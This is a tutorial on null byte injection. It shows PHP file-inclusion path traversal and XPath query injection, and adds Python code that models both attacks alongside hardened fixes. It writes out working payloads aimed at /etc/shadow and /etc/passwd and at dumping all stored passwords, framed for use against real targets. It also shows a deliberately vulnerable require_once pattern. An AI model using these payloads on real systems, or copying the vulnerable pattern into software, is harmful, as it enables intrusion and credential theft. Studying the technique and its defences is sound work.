Null Byte Poisoning

Prerequisites: 

Be able to type %00 and know the structure of the server file system.

So what is a Null Byte? It is not just some guy that hangs around the SoldierX web site and rambles on and on, putting his two cents in or adding tools to the site. No. A null byte is the 0x00 character. In C, and in every library written in C, that byte marks the end of a string, and anything after it is ignored. When a web application appends something to user input (a file extension, the tail of a query) and then hands the result to a C-based library, an attacker who can get a null byte into the input cuts the appended part off and keeps only what he supplied. The trick goes back to the late 1980s; the name is no coincidence.

The original injection flaw was found in CGI scripts written in C, Perl and Python. Most web scripting languages in use today are themselves implemented in C and sooner or later pass their strings to C library functions such as open() or fopen(); the interpreter knows how long the string really is, but the C layer stops reading at the first null byte. PHP in particular is still one of the major contributors to null byte injection (before PHP 5.3.4 its filesystem functions passed paths with embedded null bytes straight through to the operating system). Null bytes can be used for directory traversal, for tampering with queries against a database or an XML store, and for injecting code into an application. I will cover attacks on two different targets in this tutorial: PHP file inclusion and XPath queries. For the first I will show directory traversal, for the second query injection.
Ok, I'm done rambling, let's see what this injection looks like. It is very simple.

So we have a url that looks something like this:
http://vulnerable-site.com/script.php?doc=someotherfile.txt

The code behind this looks like so:
$doc = $_GET['doc'];
require_once("/var/www/locationOfFile/$doc.txt");

So let's see, what's wrong with this script? Nothing, looks good to me right? Wrong!

This request can be manipulated by adding a null byte to the end of the parameter. %00 is the URL encoding of a single 0x00 byte. PHP builds the string "/var/www/locationOfFile/../../../../../../etc/shadow\0.txt" and passes it to the C-level open call, which stops at the \0, so the ".txt" the developer appended never reaches the filesystem and the "../" sequences walk back up to the root of the disk. As I stated, the injection technique is very simple, yet very effective. It is performed like so:
http://vulnerable-site.com/script.php?doc=../../../../../../etc/shadow%00

If the web server process is allowed to read the target, this dumps the file to the screen, and all we have to do is copy and paste the hashes into a new file for cracking. One caveat: /etc/shadow is readable only by root (and the shadow group), and the web server normally runs as an unprivileged user such as www-data, so the shadow file is usually the one file this will not hand you. /etc/passwd, the application's own configuration files with the database credentials in them, and the server's log files are the usual first targets. The technique works for any file on the system that the server process can read. There are many other forms of null byte injection, such as its use with XPath injection.
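To make the truncation concrete, here is an added example in Python (not code from the tutorial). c_string_view() reproduces what a NUL-terminated C API sees of a string, vulnerable_include() mirrors the tutorial's PHP (append ".txt", no checks), and safe_include_path() is one hardened replacement: refuse null bytes, resolve the path, and insist it stays under the document directory. The directory tree, the file contents and the payload are constructed stand-ins for /var/www/locationOfFile and /etc/passwd; the function names are my own.

```python
"""Null-byte path truncation, modelled in Python.

The tutorial's PHP appends ".txt" and hands the path to the C library; C
strings end at the first 0x00 byte, so everything after a %00 sent by the
client is silently dropped. c_string_view() reproduces that view.
"""
import os
import tempfile
from urllib.parse import unquote


def c_string_view(s: str) -> str:
    """What a NUL-terminated C API (open(2), fopen(3)) sees of s."""
    nul = s.find("\x00")
    return s if nul == -1 else s[:nul]


def vulnerable_include(base_dir: str, doc: str) -> str:
    """Mirror of the tutorial's PHP: base_dir/$doc.txt with no validation.
    Returns the path that actually reaches the C layer."""
    return c_string_view(os.path.join(base_dir, doc + ".txt"))


def safe_include_path(base_dir: str, doc: str) -> str:
    """Hardened version: refuse NUL bytes, then resolve symlinks and '..'
    and insist the result still lives under base_dir."""
    if "\x00" in doc:
        raise ValueError("NUL byte in document name")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, doc + ".txt"))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("document name escapes the document directory")
    return candidate


def demo() -> dict:
    """Build a throwaway tree and fire the tutorial's payload at both versions."""
    root = tempfile.mkdtemp()
    docs = os.path.join(root, "locationOfFile")        # stand-in for /var/www/locationOfFile
    os.makedirs(docs)
    with open(os.path.join(docs, "someotherfile.txt"), "w") as f:
        f.write("harmless document\n")
    secret = os.path.join(root, "etc", "passwd")        # constructed stand-in for /etc/passwd
    os.makedirs(os.path.dirname(secret))
    with open(secret, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")

    # Exactly what the server's URL decoder produces from ../etc/passwd%00
    payload = unquote("../etc/passwd%00")

    opened = vulnerable_include(docs, payload)          # the ".txt" is gone
    with open(opened) as f:
        leaked = f.read()

    def blocked(name: str) -> bool:
        try:
            safe_include_path(docs, name)
        except ValueError:
            return True
        return False

    return {
        "opened": opened,
        "leaked": leaked,
        "nul_blocked": blocked(payload),
        "traversal_blocked": blocked("../etc/passwd"),
        "legit_ok": os.path.isfile(safe_include_path(docs, "someotherfile")),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Two things worth knowing when you try this against a real target: PHP 5.3.4 and later reject filesystem paths that contain a null byte, and Python's own open() raises ValueError on an embedded null, which is why the model above has to truncate explicitly instead of relying on the runtime to do it. The traversal check (realpath plus prefix comparison) is needed regardless of the null byte, since "../etc/passwd" on its own still escapes the directory whenever a readable file with the expected extension exists there.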
This brings me to XPath injection through the use of null bytes.
What is XPath? XPath is a query language for selecting nodes from an XML document. This attack is quite different from the directory traversal one: it is a query injection, the same idea as SQL injection but aimed at an XML store.
Let's take a look at an XPath query and the XML document it runs against.

XML Code:
<customers>
<username>
<name>Bob</name>
<password>SmithDog</password>
<addressLine1>123 Some Street</addressLine1>
<addressLine2>Las Vegas, NV</addressLine2>
<email>[email protected]</email>
<CCardNumber>1234-5678-9012-3456</CCardNumber>
</username>
</customers>

As you can see, the XML file is pretty straightforward. Now for the query that pulls data out of this credentials file and hands the user a small, well-formed XML document. To look up Bob's e-mail address the application issues the following query, which reads much like the WHERE clause of a SQL query built in PHP:
/customers/username[name='Bob' and password='SmithDog']/email

So how do we leverage this query? With a null byte, of course. The application drops the supplied name and password straight into the query string, so the attacker sends this as the password value (normally through an intercepting proxy such as Burp Suite; the pluses are URL-encoded spaces):

'+or+1=1]/password%00

After the server assembles the query it looks like this:

/customers/username[name='Bob' and password='' or 1=1]/password%00']/email

It is that simple. The leading ' closes the password literal, or 1=1 makes the predicate true for every record, ]/password selects the node we actually want, and the null byte cuts off the ']/email the application appends. Provided the XPath engine receives the expression as a NUL-terminated C string (libxml2's xmlXPathEval takes one, so bindings that pass the string through without checking for null bytes are affected), what gets evaluated is /customers/username[name='Bob' and password='' or 1=1]/password, which returns the password of every customer in the file; swap /password for another child name and the rest of each record follows. This looks a lot like SQL injection, doesn't it? That is because it is the same attack, only aimed at XPath.
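Here is an added Python example (not the tutorial's code) that assembles the query both ways. build_query_unsafe() mirrors the tutorial's string interpolation, c_string_view() shows what a C XPath engine evaluates once the null byte is in place, and build_query_safe() is one fix: reject null bytes and encode every user value as a proper XPath 1.0 string literal, using concat() when a value contains both kinds of quote (XPath has no escape character inside a literal). The payload is the tutorial's own, URL-decoded as the server would decode it; the function names are my own.

```python
"""XPath injection with null-byte truncation, modelled in Python."""
from urllib.parse import unquote_plus


def c_string_view(s: str) -> str:
    """What a C XPath engine sees of s once it is passed as a char*."""
    nul = s.find("\x00")
    return s if nul == -1 else s[:nul]


def build_query_unsafe(name: str, password: str) -> str:
    """Mirror of the tutorial's query construction: raw string interpolation."""
    return f"/customers/username[name='{name}' and password='{password}']/email"


def xpath_literal(value: str) -> str:
    """Encode value as an XPath 1.0 string literal.

    Pick the quote kind the value does not contain; if it contains both,
    glue the pieces together with concat() and pass each apostrophe as its
    own double-quoted literal."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    pieces = [f"'{p}'" for p in value.split("'")]
    return "concat(" + ", \"'\", ".join(pieces) + ")"


def build_query_safe(name: str, password: str) -> str:
    """Hardened builder: NUL bytes are an error, everything else is a literal."""
    for v in (name, password):
        if "\x00" in v:
            raise ValueError("NUL byte in XPath input")
    return (f"/customers/username[name={xpath_literal(name)}"
            f" and password={xpath_literal(password)}]/email")


def demo() -> dict:
    raw = "'+or+1=1]/password%00"      # the tutorial's password parameter, as sent
    payload = unquote_plus(raw)         # -> "' or 1=1]/password\x00"

    unsafe = build_query_unsafe("Bob", payload)
    effective = c_string_view(unsafe)   # what the engine actually evaluates

    try:
        build_query_safe("Bob", payload)
        nul_rejected = False
    except ValueError:
        nul_rejected = True

    # Same text without the NUL: once quoted it is just a password nobody has.
    safe = build_query_safe("Bob", payload.rstrip("\x00"))
    return {"unsafe": unsafe, "effective_unsafe": effective,
            "nul_rejected": nul_rejected, "safe": safe}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The literal encoding is the important half of the fix: rejecting null bytes alone still leaves the classic ' or 1=1 injection working. Where the XPath library offers variable binding (the XPath equivalent of a prepared statement), prefer that over building literals by hand.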